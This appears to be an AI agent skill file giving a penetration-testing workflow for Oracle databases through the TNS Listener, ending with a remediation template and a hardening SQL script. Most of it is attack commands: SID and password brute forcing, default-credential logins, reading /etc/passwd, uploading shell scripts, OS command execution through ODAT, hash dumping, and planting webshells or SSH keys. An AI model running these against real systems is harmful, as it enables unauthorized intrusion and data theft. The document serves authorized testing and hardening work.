---
name: pentesting-oracle
description: Testing Oracle Database via the TNS Listener (default ports 1521, plus secondary listeners 1522-1529) for SID disclosure/bruteforce, default and weak account credentials, TNS listener misconfiguration and poisoning, and ODAT-driven file read/write and OS command-execution primitives during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- database
- oracle
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting Oracle TNS Listener (port 1521)

## When to Use
- Default `1521/tcp` (TNS Listener); secondary listeners commonly on `1522-1529`, legacy on `1748`.
- Banner like `Oracle TNS Listener 9.2.0.1.0`; the listener is the entry point — you must learn a **SID/service name** before authenticating.
- Use when `nmap` shows `oracle-tns`, when you have recovered DB account creds, or to abuse the listener (older versions allow remote control / poisoning).

## Quick Enumeration
```bash
# Version
nmap --script oracle-tns-version -p1521 -sV <IP>
nmap --script "oracle-sid-brute" -p1521 <IP>          # discover SIDs

# All-in-one with ODAT (the primary Oracle pentest tool)
./odat-libc2.12-x86_64 all -s <IP> -p 1521

# SID + credential brute via ODAT
./odat sidguesser -s <IP> -p 1521
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt

msfconsole -q -x 'use auxiliary/scanner/oracle/sid_enum; set RHOSTS <IP>; run; exit'
```

## Critical: Checks Most Often Missed
- **SID/service name disclosure** — without a SID you cannot log in; older listeners disclose it, otherwise brute force it.
  - How to CONFIRM: `nmap --script oracle-sid-brute -p1521 <IP>` or `./odat sidguesser -s <IP>` returns a SID (e.g. `XE`, `ORCL`, `PLSExtProc`).
- **Default / weak account credentials** — Oracle ships many well-known accounts: `system:manager`, `sys:change_on_install`, `scott:tiger`, `dbsnmp:dbsnmp`, `outln:outln`, `system:oracle`.
  - How to CONFIRM: `sqlplus system/manager@<IP>:1521/<SID>` connects, or `./odat passwordguesser` reports valid pairs.
- **TNS listener with no password / TNS poison (CVE-2012-1675)** — an unauthenticated listener can be queried/reconfigured; TNS poisoning lets an attacker register a rogue instance and MITM sessions.
  - How to CONFIRM: `tnscmd10g status -h <IP>` returns listener details without a password; check listener version against CVE-2012-1675.
- **File read/write + OS command execution via ODAT** — with a valid DB account, abuse `UTL_FILE` (read/write files), external tables, `DBMS_SCHEDULER`/Java stored procedures (run OS commands), and `UTL_HTTP`/`UTL_TCP` for SSRF.
  - How to CONFIRM: `./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /etc passwd ./passwd` retrieves a file (arguments are remote directory, remote file name, local destination); `./odat externaltable ... --exec ...` or `./odat dbmsscheduler ... --exec` runs a command.
- **Privilege escalation via PUBLIC/EXECUTE grants** — over-granted packages (`DBMS_*`) let low-priv users escalate to DBA.

## Workflow

### Step 1: Enumerate (version, SID, accounts)
```bash
nmap --script oracle-tns-version,oracle-sid-brute -p1521 <IP>
./odat sidguesser -s <IP> -p 1521
# Once a SID is known, fingerprint accessible accounts
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt
```

### Step 2: Authenticate (default/weak creds, brute force)
```bash
# Native client (instantclient sqlplus)
sqlplus <user>/<pass>@<IP>:1521/<SID>
sqlplus system/manager@<IP>:1521/XE
# As SYSDBA
sqlplus sys/change_on_install@<IP>:1521/XE as sysdba

# Brute force
./odat passwordguesser -s <IP> -d <SID> --accounts-file /usr/share/oscanner/accounts.default
hydra -P passwords.txt <IP> oracle-listener   # listener password only; 'oracle-sid' guesses SIDs, 'oracle' (needs OCI libs) brute-forces user/pass
nxc oracle <IP> --sid <SID> -u users.txt -p passwords.txt
```

### Step 3: Exploit / Extract (data dump + ODAT file/RCE primitive)
```sql
-- Native recon once connected
SELECT * FROM v$version;
SELECT username FROM all_users;
SELECT name, password, spare4 FROM sys.user$;       -- hashes (DBA)
SELECT table_name FROM all_tables;
```
```bash
# Arbitrary file READ / WRITE (UTL_FILE); argument order: remote directory, remote file, local file
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /etc passwd ./passwd
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --putFile /tmp shell.sh ./shell.sh

# OS command execution
./odat externaltable -s <IP> -d <SID> -U <user> -P <pass> --exec /tmp run.sh
./odat dbmsscheduler -s <IP> -d <SID> -U <user> -P <pass> --exec "/bin/bash -c 'id'"
./odat java        -s <IP> -d <SID> -U <user> -P <pass> --exec "id"

# Run every ODAT module against the account to see which file/command primitives it can actually use
./odat all -s <IP> -d <SID> -U <user> -P <pass>
```

### Step 4: Post-access / privilege escalation / pivot
- Dump `sys.user$` password hashes (Oracle 10g DES, 11g SHA-1 `spare4`) and crack with Hashcat (modes **3100** / **112**).
- Abuse over-granted `DBMS_*` packages or `CREATE ANY PROCEDURE`/`EXECUTE ANY` to reach DBA, then SYSDBA.
- Use `UTL_HTTP`/`UTL_TCP`/`UTL_INADDR` from the DB for SSRF / internal port scanning, and the DB host file-write to land SSH keys or webshells.
- Reuse recovered Oracle creds (often reused for `dbsnmp`, app accounts) against other services.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **TNS Listener** | Network front-end on 1521 that routes clients to DB instances; must be queried for a SID. |
| **SID / Service name** | Identifier of a database instance required to authenticate (e.g. `XE`, `ORCL`). |
| **Default accounts** | Well-known creds (`system/manager`, `sys/change_on_install`, `scott/tiger`, `dbsnmp/dbsnmp`). |
| **TNS poisoning (CVE-2012-1675)** | Rogue instance registration on an unauthenticated listener enabling session MITM. |
| **UTL_FILE** | PL/SQL package for reading/writing files on the DB server. |
| **External tables / DBMS_SCHEDULER / Java SP** | PL/SQL mechanisms ODAT abuses for OS command execution. |
| **UTL_HTTP / UTL_TCP** | Outbound network packages enabling SSRF and internal scanning. |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **ODAT** | Oracle Database Attacking Tool — SID guess, password guess, UTL_FILE read/write, external-table/DBMS_SCHEDULER/Java command exec, `all` chain. |
| **sqlplus / instantclient** | Native client for authenticated queries and SYSDBA login. |
| **nmap NSE** | `oracle-tns-version`, `oracle-sid-brute`, `oracle-brute`, `oracle-enum-users`. |
| **Metasploit** | `scanner/oracle/sid_enum`, `tnscmd`, `oracle_login`, listener/version modules. |
| **netexec (nxc)** | `nxc oracle <IP> --sid <SID> -u .. -p ..` for auth/spraying. |
| **hydra** | Brute force `oracle-listener` / `oracle-sid` services. |
| **Hashcat / John** | Crack dumped `sys.user$` hashes (modes 3100 / 112). |

## Common Scenarios
### Scenario 1: SID brute → default creds → data dump
`oracle-sid-brute` reveals SID `XE`. `sqlplus system/manager@<IP>:1521/XE` connects with the default password, and the tester dumps application tables and `sys.user$` hashes.

### Scenario 2: Valid account → OS command execution
With a low-priv DB account, ODAT's external-table module writes a script to disk and executes it (`./odat externaltable ... --exec`), returning command output as the Oracle OS user.

### Scenario 3: Unauthenticated listener → poisoning
An old listener answers `tnscmd10g status` without a password and is vulnerable to CVE-2012-1675, allowing a rogue instance to be registered and client sessions to be intercepted.

## Output Format
```
## Oracle Finding

**Service**: Oracle TNS Listener
**Port**: 1521/tcp (Oracle 11g, SID=XE)
**Severity**: Critical
**Finding**: Default SYSTEM credentials enabling file read and OS command execution
**Evidence**:
  - nmap oracle-sid-brute -> SID "XE"
  - sqlplus system/manager@<IP>:1521/XE -> connected
  - ./odat externaltable -s <IP> -d XE -U system -P manager --exec /tmp id -> uid=54321(oracle)
**Impact**: Full database compromise plus OS command execution as the Oracle service account.
**Recommendation**:
  1. Change all default account passwords; lock/expire unused accounts (scott, dbsnmp, outln).
  2. Set a listener password and apply patches for CVE-2012-1675 (enable Valid Node Checking).
  3. Restrict 1521-1529 by firewall/source IP.
  4. Revoke EXECUTE on UTL_FILE / DBMS_SCHEDULER / Java from PUBLIC and least-privilege app accounts.
```
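The recommendation list above, turned into an audit-and-fix script. This is an added example, not part of the skill or of ODAT: it assumes you are connected as SYS (`AS SYSDBA`) to 11g or later, and the account names and package list are the ones this page names; the new SYSTEM password is a placeholder.

```sql
-- Added example (not from the original skill): audit and harden the items in
-- the recommendation list. Run as SYS AS SYSDBA on Oracle 11g+.

-- 1. Which accounts still carry a vendor default password? (11g+ view)
SELECT username
FROM   dba_users_with_defpwd
ORDER  BY username;

-- Lock and expire the sample/legacy accounts named in the findings.
ALTER USER scott  ACCOUNT LOCK PASSWORD EXPIRE;
ALTER USER dbsnmp ACCOUNT LOCK PASSWORD EXPIRE;
ALTER USER outln  ACCOUNT LOCK PASSWORD EXPIRE;
-- SYSTEM must stay usable: rotate it instead of locking it (placeholder value).
ALTER USER system IDENTIFIED BY "<new-strong-password>";

-- 2. Which file / network / OS-exec packages can PUBLIC still execute?
SELECT table_name AS package_name, privilege
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
AND    owner   = 'SYS'
AND    table_name IN ('UTL_FILE', 'UTL_HTTP', 'UTL_TCP', 'UTL_INADDR',
                      'DBMS_SCHEDULER', 'DBMS_JAVA');

-- Revoke from PUBLIC; re-grant EXECUTE only to the application schemas
-- that demonstrably need each package.
REVOKE EXECUTE ON UTL_FILE       FROM PUBLIC;
REVOKE EXECUTE ON UTL_HTTP       FROM PUBLIC;
REVOKE EXECUTE ON UTL_TCP        FROM PUBLIC;
REVOKE EXECUTE ON UTL_INADDR     FROM PUBLIC;
REVOKE EXECUTE ON DBMS_SCHEDULER FROM PUBLIC;
REVOKE EXECUTE ON DBMS_JAVA      FROM PUBLIC;

-- 3. Who holds the system privileges Step 4 lists as paths to DBA?
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
AND    grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
ORDER  BY grantee;
```

Some Oracle-supplied components depend on the PUBLIC grants on `UTL_*`, so run the revokes in a test instance first and re-grant per schema as needed. Valid Node Checking for the listener is configured separately in `sqlnet.ora` on the database host with `TCP.VALIDNODE_CHECKING = YES` and an explicit `TCP.INVITED_NODES` list.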
